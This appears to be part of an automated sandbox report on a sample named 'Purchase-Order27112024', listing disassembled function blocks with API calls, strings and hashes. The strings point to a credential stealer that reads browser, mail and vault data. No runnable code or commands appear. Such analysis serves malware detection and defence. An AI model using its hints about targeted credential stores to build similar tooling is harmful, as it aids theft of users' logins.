                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                      • String ID: MS Sans Serif
                                                                                                      • API String ID: 3492281209-168460110
                                                                                                      • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                      • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                      • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                      • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassName_strcmpimemset
                                                                                                      • String ID: edit
                                                                                                      • API String ID: 275601554-2167791130
                                                                                                      • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                      • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                      • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                      • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$_mbscat
                                                                                                      • String ID: 3CD
                                                                                                      • API String ID: 3951308622-1938365332
                                                                                                      • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                      • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                      • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                      • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                      APIs
                                                                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1860491036-0
                                                                                                      • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                      • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                      • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                      • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040D2C2
                                                                                                      • memset.MSVCRT ref: 0040D2D8
                                                                                                      • memset.MSVCRT ref: 0040D2EA
                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                      • memset.MSVCRT ref: 0040D319
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 368790112-0
                                                                                                      • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                      • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                      • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                      • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • too many SQL variables, xrefs: 0042C6FD
                                                                                                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                      • API String ID: 2221118986-515162456
                                                                                                      • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                      • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                      • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                      • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                      APIs
                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                      • memset.MSVCRT ref: 004026AD
                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                        • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                        • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                      • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3503910906-0
                                                                                                      • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                      • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                      • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                      • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                      • strlen.MSVCRT ref: 0040B60B
                                                                                                      • atoi.MSVCRT(?,00000000,?,76230A60,?,00000000), ref: 0040B619
                                                                                                      • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                      • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 4107816708-0
                                                                                                      • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                      • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                      • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                      • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                      • _gmtime64.MSVCRT ref: 00411437
                                                                                                      • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                      • strftime.MSVCRT ref: 00411476
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                      • String ID:
                                                                                                      • API String ID: 1886415126-0
                                                                                                      • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                      • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                      • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                      • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen
                                                                                                      • String ID: >$>$>
                                                                                                      • API String ID: 39653677-3911187716
                                                                                                      • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                      • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                      • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                      • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                      • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                      • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                      • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                      • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strcmpi
                                                                                                      • String ID: C@$mail.identity
                                                                                                      • API String ID: 1439213657-721921413
                                                                                                      • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                      • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                      • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                      • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00406640
                                                                                                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                      • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                      • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset$memcmp
                                                                                                      • String ID: Ul@
                                                                                                      • API String ID: 270934217-715280498
                                                                                                      • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                      • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                      • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                      • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                      APIs
                                                                                                        • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                      Strings
                                                                                                      • recovered %d pages from %s, xrefs: 004188B4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                      • String ID: recovered %d pages from %s
                                                                                                      • API String ID: 985450955-1623757624
                                                                                                      • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                      • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                      • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                      • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _ultoasprintf
                                                                                                      • String ID: %s %s %s
                                                                                                      • API String ID: 432394123-3850900253
                                                                                                      • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                      • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                      • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                      • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                      APIs
                                                                                                      • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                      • sprintf.MSVCRT ref: 0040909B
                                                                                                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                      • String ID: menu_%d
                                                                                                      • API String ID: 1129539653-2417748251
                                                                                                      • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                      • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                      • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                      • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                      APIs
                                                                                                      • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                      • _mbscat.MSVCRT ref: 004070FA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscat$_mbscpystrlen
                                                                                                      • String ID: sqlite3.dll
                                                                                                      • API String ID: 1983510840-1155512374
                                                                                                      • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                      • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                      • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                                                                      • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                      APIs
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                      • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow
                                                                                                      • String ID: MZ@
                                                                                                      • API String ID: 1378638983-2978689999
                                                                                                      • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                      • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                                                                      • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                                                                      • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                                                                      APIs
                                                                                                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileString
                                                                                                      • String ID: A4@$Server Details
                                                                                                      • API String ID: 1096422788-4071850762
                                                                                                      • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                      • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                      • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                      • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                      APIs
                                                                                                      • strlen.MSVCRT ref: 0040849A
                                                                                                      • memset.MSVCRT ref: 004084D2
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,75B4EB20,?,00000000), ref: 0040858F
                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,75B4EB20,?,00000000), ref: 004085BA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
